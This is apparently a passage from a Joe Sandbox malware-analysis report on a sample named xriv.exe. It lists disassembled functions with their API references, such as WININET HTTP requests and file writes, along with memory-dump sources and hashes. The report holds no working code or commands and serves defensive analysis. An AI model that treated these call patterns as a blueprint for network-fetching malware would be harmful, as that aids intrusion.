InternetOpenW.WININET(01393F6C,00000000,00000000,00000000,00000000), ref: 0136871C
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 01368740
HttpOpenRequestA.WININET(?,00000000), ref: 0136878A
HttpSendRequestA.WININET(?,00000000), ref: 0136884A
InternetReadFile.WININET(?,?,000003FF,?), ref: 013688FC
InternetReadFile.WININET(?,00000000,000003FF,?), ref: 013689B0
InternetCloseHandle.WININET(?), ref: 013689D7
InternetCloseHandle.WININET(?), ref: 013689DF
InternetCloseHandle.WININET(?), ref: 013689E7

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSend
String ID:
API String ID: 1354133546-0
Opcode ID: 9215dc1c7c77508a28cee1cff568cd2eb5598e0f581621e4be6e82de333c941c
Instruction ID: 63d313f4cde4ad322ae7e6a5c74049de662920fd386c2c45f7e32b673d36f1f6
Opcode Fuzzy Hash: 9215dc1c7c77508a28cee1cff568cd2eb5598e0f581621e4be6e82de333c941c
Instruction Fuzzy Hash: BDC1F8B06102199BEB28CF28CC88BDD7F79EF45318F5481E8E60897299D7759AC0CF95

Uniqueness

Uniqueness Score: -1.00%

Function 01385642 Relevance: 13.8, APIs: 9, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef68f6ec86eac2c26c5366e115fadec6d7b31c9c98d7bbc0f38f0bd1f6ef9655
Instruction ID: ecd1013ba2df94cb66fa50838a4f7b489f497faa3faf0f2e01577dc791cb9a52
Opcode Fuzzy Hash: ef68f6ec86eac2c26c5366e115fadec6d7b31c9c98d7bbc0f38f0bd1f6ef9655
Instruction Fuzzy Hash: 9BC1F371E0434A9FEF21EF9CD880BADBBB5AF4A328F144059E515AB381C7349941CF61

Uniqueness

Uniqueness Score: -1.00%

Function 01380AD9 Relevance: 12.2, APIs: 8, Instructions: 203COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 01380B03
_free.LIBCMT ref: 01380BDC
_free.LIBCMT ref: 01380C09

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: b2d7d02a4ef05aef43a781f0c118bfe249aa78d1d6e5f7c918c1472bb84075ce
Instruction ID: 61eae9c0b094f5f0d10e5c1797b9d990495a6e2e093edd3564ad3816fbf2bd3b
Opcode Fuzzy Hash: b2d7d02a4ef05aef43a781f0c118bfe249aa78d1d6e5f7c918c1472bb84075ce
Instruction Fuzzy Hash: AF510571904386AFEF39BFBC8880A6D7BB8AF0171CF04416EF9159B285DB758149CB51

Uniqueness

Uniqueness Score: -1.00%

Function 01378570 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 013785A7
___except_validate_context_record.LIBVCRUNTIME ref: 013785AF
_ValidateLocalCookies.LIBCMT ref: 01378638
__IsNonwritableInCurrentImage.LIBCMT ref: 01378663
_ValidateLocalCookies.LIBCMT ref: 013786B8

Strings

csm, xrefs: 0137864D

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 3f3e00f0c8e48078f8adb7e6205a3abe4c6997d6e252ee8548c171130102d65d
Instruction ID: c8d10410dac8ed6da960bbd24e5b502b2f3e9c69b3dc6d4935200b641eb3965b
Opcode Fuzzy Hash: 3f3e00f0c8e48078f8adb7e6205a3abe4c6997d6e252ee8548c171130102d65d
Instruction Fuzzy Hash: B9417034A00219EBCF20DF6DC888A9EBFB5AF5533CF148195DA189B351D7399A05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0137E1FE Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

api-ms-, xrefs: 0137E255
ext-ms-, xrefs: 0137E269

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 67d97acbdacd0e74b2d1fa322970a25adbaa4bd15bb8082537105a4441bc0c97
Instruction ID: 28f1ebd7929cff0619fdf1487960c8a81e5b031687a337d27f641061b4d03b98
Opcode Fuzzy Hash: 67d97acbdacd0e74b2d1fa322970a25adbaa4bd15bb8082537105a4441bc0c97
Instruction Fuzzy Hash: 8E21EB72A41325AFEB326769DC84A5E3B5C9F15768F1506B4ED05BB684EA38D80087D0

Uniqueness

Uniqueness Score: -1.00%

Function 0138143D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 01381405: _free.LIBCMT ref: 0138142A

_free.LIBCMT ref: 0138148B

Part of subcall function 0137D653: HeapFree.KERNEL32(00000000,00000000,?,0138142F,?,00000000,?,?,?,01381456,?,00000007,?,?,01381858,?), ref: 0137D669
Part of subcall function 0137D653: GetLastError.KERNEL32(?,?,0138142F,?,00000000,?,?,?,01381456,?,00000007,?,?,01381858,?,?), ref: 0137D67B

_free.LIBCMT ref: 01381496
_free.LIBCMT ref: 013814A1
_free.LIBCMT ref: 013814F5
_free.LIBCMT ref: 01381500
_free.LIBCMT ref: 0138150B
_free.LIBCMT ref: 01381516

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 745ba4c7df38b0c8b3501d58b22aa89868de86b005191e755d783c3d27d16807
Instruction ID: 57f1a5a70c60786db3af54e5b8ec37652309825c551b91b8a872dc24ad7a876d
Opcode Fuzzy Hash: 745ba4c7df38b0c8b3501d58b22aa89868de86b005191e755d783c3d27d16807
Instruction Fuzzy Hash: 53118172540B09AED670BFB9CC05FCB77AC9F10709F814815A29FBB050DA2CB546C694

Uniqueness

Uniqueness Score: -1.00%

Function 01382AF8 Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,01365140,00000000), ref: 01382B40
__fassign.LIBCMT ref: 01382D1F
__fassign.LIBCMT ref: 01382D3C
WriteFile.KERNEL32(?,01365140,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01382D84
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 01382DC4
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 01382E70

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: 7e51717dd878f44d3de515fa0361909e20995e89a031f58e91e3b01707d75138
Instruction ID: bac93ca96b713b0912ed696ef4300661d678c20fcc50fdddf63883e87bded951
Opcode Fuzzy Hash: 7e51717dd878f44d3de515fa0361909e20995e89a031f58e91e3b01707d75138
Instruction Fuzzy Hash: 15D1BC71D002589FDF15DFE8C8809EEBBB5BF48318F28016AE859BB241D731AA46CF54

Uniqueness

Uniqueness Score: -1.00%

Function 01378890 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,01378887,01378476,01377AC4), ref: 0137889E
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 013788AC
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 013788C5
SetLastError.KERNEL32(00000000,01378887,01378476,01377AC4), ref: 01378917

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 55309400f491bfa37ea9db4ad6165cb6bbdceadc4c7ef0b60c9a00ff711f9fa0
Instruction ID: 2741ed53cee947b262a9767b30e3a922ae10d7b8f3b223a51bd66af9543e3ffa
Opcode Fuzzy Hash: 55309400f491bfa37ea9db4ad6165cb6bbdceadc4c7ef0b60c9a00ff711f9fa0
Instruction Fuzzy Hash: AA01283251A3177EF631267D7C88A1B2A9CEF427FDB2003AAE120A05D8EE1A48104340

Uniqueness

Uniqueness Score: -1.00%

Function 0138002E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, xrefs: 01380033

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
API String ID: 0-3702952914
Opcode ID: 3058ff3f5bd0e39671a7e797905bfd2cd961971263dab1c0fed919919b66158d
Instruction ID: 3b935b9bc40691dfb194caea0df7029d3786ce441910919855adc282a085002e
Opcode Fuzzy Hash: 3058ff3f5bd0e39671a7e797905bfd2cd961971263dab1c0fed919919b66158d
Instruction Fuzzy Hash: 272192B160430AAFEB35BF698C8096BB7ADEF0036D7104524F92596291EB35EC4687A0

Uniqueness

Uniqueness Score: -1.00%

Function 0137B476 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 0137B4B8

Strings

.com, xrefs: 0137B4F8
.bat, xrefs: 0137B4E7
.cmd, xrefs: 0137B4D6
.exe, xrefs: 0137B4C5

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: a1835754be813542b7402e2146b826236e673b7bcaa1f30b74d1f8adc662b888
Instruction ID: abaeb707fdd6fffdb65422498e5180f7e4ee815923d2e9ea01c5c64a13f8c310
Opcode Fuzzy Hash: a1835754be813542b7402e2146b826236e673b7bcaa1f30b74d1f8adc662b888
Instruction Fuzzy Hash: F801DB7B60471B65E734212D9C016279BBC8BD2ABC736002EFA54F7284EE5CD8035190

Uniqueness

Uniqueness Score: -1.00%

Function 01379937 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

Strings

api-ms-, xrefs: 01379987

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID:
String ID: api-ms-
API String ID: 0-2084034818
Opcode ID: cdc1808c670423ec9f26ae03eeab71bed74be41e89ca9d5b01c06b78816e4df7
Instruction ID: 5f8cde7767264ccf759e4ee2f85bd6304d60108c9ce8dd3d85058b960d31f4b4
Opcode Fuzzy Hash: cdc1808c670423ec9f26ae03eeab71bed74be41e89ca9d5b01c06b78816e4df7
Instruction Fuzzy Hash: 9411B972A05627ABFB328B29DC80B5E779C9B037BCF110720E905A7285E638ED00C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 0137A9E3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0137A9D8,0137E000,?,0137A9A0,0137AF26,?,0137E000), ref: 0137A9F8
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0137AA0B
FreeLibrary.KERNEL32(00000000,?,?,0137A9D8,0137E000,?,0137A9A0,0137AF26,?,0137E000), ref: 0137AA2E

Strings

mscoree.dll, xrefs: 0137A9F1
CorExitProcess, xrefs: 0137AA03

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: dd172d42b3a52402ebc93934809b0dd529b82a2fe33521943ffd2907e474db99
Instruction ID: f4ae072e79a0682acae03b4cf1c580499ad9a8ff57ad34c7e2abb1f5a1173b1d
Opcode Fuzzy Hash: dd172d42b3a52402ebc93934809b0dd529b82a2fe33521943ffd2907e474db99
Instruction Fuzzy Hash: 7FF01C71601319FBEB31AB55DE09BDE7FACEB4475EF140064EA05A2190CB788A11DB91

Uniqueness

Uniqueness Score: -1.00%

Function 01386069 Relevance: 7.7, APIs: 5, Instructions: 244COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(01674790,01674790,?,7FFFFFFF,?,?,01386325,01674790,01674790,?,01674790,?,?,?,?,01674790), ref: 0138610C
__alloca_probe_16.LIBCMT ref: 013861C2
__alloca_probe_16.LIBCMT ref: 01386258
__freea.LIBCMT ref: 013862C3
__freea.LIBCMT ref: 013862CF

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: __alloca_probe_16__freea$Info
String ID:
API String ID: 2330168043-0
Opcode ID: e6e7bcfe475785adee906e9c2d055aec88d8c92656773efefa1902f2b5f1810b
Instruction ID: a3182c2542e1f045f02dec74c640a725e58f031c4224ae222985c86181c4c0b8
Opcode Fuzzy Hash: e6e7bcfe475785adee906e9c2d055aec88d8c92656773efefa1902f2b5f1810b
Instruction Fuzzy Hash: DE81A7F1D0031A9BEF21BF98C842AEE7BBADF5935CF180195E904A7242D625C941C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 01384994 Relevance: 7.7, APIs: 5, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 01384A18
__alloca_probe_16.LIBCMT ref: 01384ADE
__freea.LIBCMT ref: 01384B4A

Part of subcall function 0137DB3C: RtlAllocateHeap.NTDLL(00000000,?,?,?,01378272,?,?,?,?,?,013620C3,?,?), ref: 0137DB6E

__freea.LIBCMT ref: 01384B53
__freea.LIBCMT ref: 01384B76

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: 857ff1008832533d6a0694004a70708e0b2a295f217648808f1cd565f643dbf9
Instruction ID: 393a1a761a117bc673a62bd3277a42b67c7cf80fe47862c837db542b6259bcdc
Opcode Fuzzy Hash: 857ff1008832533d6a0694004a70708e0b2a295f217648808f1cd565f643dbf9
Instruction Fuzzy Hash: 1051D57250031BAFEB326FA8DC40FBBBAA9DF55668F194129FD14AB540E734DD1086A0

Uniqueness

Uniqueness Score: -1.00%

Function 0137B1AE Relevance: 7.6, APIs: 5, Instructions: 141pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0137B0E0), ref: 0137B1D0
GetFileInformationByHandle.KERNEL32(?,?), ref: 0137B22A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0137B0E0,?,000000FF,00000000,00000000), ref: 0137B2B8
__dosmaperr.LIBCMT ref: 0137B2BF
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 0137B2FC

Part of subcall function 0137B524: __dosmaperr.LIBCMT ref: 0137B559

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 1206951868-0
Opcode ID: a7752b92475b77a82c97e764c281820deebc4037202e9f6f4fb7d38ecbc89f59
Instruction ID: de348fce65c463b6ea79fb9350497bcfc8b3adecd6355a41b2932e7afd9c815d
Opcode Fuzzy Hash: a7752b92475b77a82c97e764c281820deebc4037202e9f6f4fb7d38ecbc89f59
Instruction Fuzzy Hash: DA412A75900649AFDB34DFB9D8449AFFBF9EF89304B00452DE956D3614EB389940CB21

Uniqueness

Uniqueness Score: -1.00%

Function 0138139C Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 013813B4

Part of subcall function 0137D653: HeapFree.KERNEL32(00000000,00000000,?,0138142F,?,00000000,?,?,?,01381456,?,00000007,?,?,01381858,?), ref: 0137D669
Part of subcall function 0137D653: GetLastError.KERNEL32(?,?,0138142F,?,00000000,?,?,?,01381456,?,00000007,?,?,01381858,?,?), ref: 0137D67B

_free.LIBCMT ref: 013813C6
_free.LIBCMT ref: 013813D8
_free.LIBCMT ref: 013813EA
_free.LIBCMT ref: 013813FC

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 11a24ddf5cace416723f54ccf37d108d057886f79966d29cf4b222a03aee1d6c
Instruction ID: 0b0f9377622444f6eab23711833f37e21bdac6d2bbd3c0191e5677b3f4ffb947
Opcode Fuzzy Hash: 11a24ddf5cace416723f54ccf37d108d057886f79966d29cf4b222a03aee1d6c
Instruction Fuzzy Hash: 9BF04932500305ABD630EFACE081C0A7BEDAE40B28BA48846E11DD7940CA35F8C18AA8

Uniqueness

Uniqueness Score: -1.00%

Function 0137FA69 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0137FC03

Strings

*?, xrefs: 0137FAAC

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 7496f51c3f35c99317c8ac37739540d6bea978ec628f8cc924bc48588b70b313
Instruction ID: c98912734fe170cc479f93c02ed5b4d5d02d1f5bb82fe9c3cf1242fdbbc5cf34
Opcode Fuzzy Hash: 7496f51c3f35c99317c8ac37739540d6bea978ec628f8cc924bc48588b70b313
Instruction Fuzzy Hash: 59612B76D0021A9FDF25DFADC8805EDFBF9FF48214B24816AD825E7304D675AE418B90

Uniqueness

Uniqueness Score: -1.00%

Function 01378970 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 01378A37
___AdjustPointer.LIBCMT ref: 01378A5A
___AdjustPointer.LIBCMT ref: 01378AF6

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 5e572ae3224ee0b271c832c75e57c7be9e287ba742ac88e05a094bb65db308c8
Instruction ID: 1254ef27076b088fa14b9f233c25258c414f5f020deaa093403209d0bc9b693e
Opcode Fuzzy Hash: 5e572ae3224ee0b271c832c75e57c7be9e287ba742ac88e05a094bb65db308c8
Instruction Fuzzy Hash: 6851C272604206AFFB39AF1CC888BBA7BA4FF0431DF1405ADDA0557691E739E980C791

Uniqueness

Uniqueness Score: -1.00%

Function 01364D10 Relevance: 6.2, APIs: 4, Instructions: 155libraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(0000011C,?,774AE603,00000000), ref: 01364D89
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01364DF0
GetProcAddress.KERNEL32(00000000), ref: 01364DF7

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
